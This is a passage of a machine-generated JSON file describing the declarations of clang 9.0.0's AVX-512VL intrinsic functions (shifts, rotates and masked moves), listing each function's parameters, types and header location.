"__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4573:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4581:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4589:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4597:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4605:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4613:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4621:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4627:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4635:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4643:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4649:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_rorv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4657:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4665:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4671:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4679:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4687:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4693:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_rorv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4701:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4709:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4717:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4725:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4733:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4741:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4749:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4757:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4765:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4773:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4781:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4789:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4797:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4805:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4813:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4821:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4829:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4837:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4845:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4853:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4861:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4869:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4877:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4885:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4893:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4901:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4909:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4917:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4925:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4933:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4941:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4949:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4957:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4965:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4973:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4981:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4989:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4997:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5003:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5011:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5019:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5025:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5033:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_mov_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5041:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mov_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5049:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mov_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5058:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } 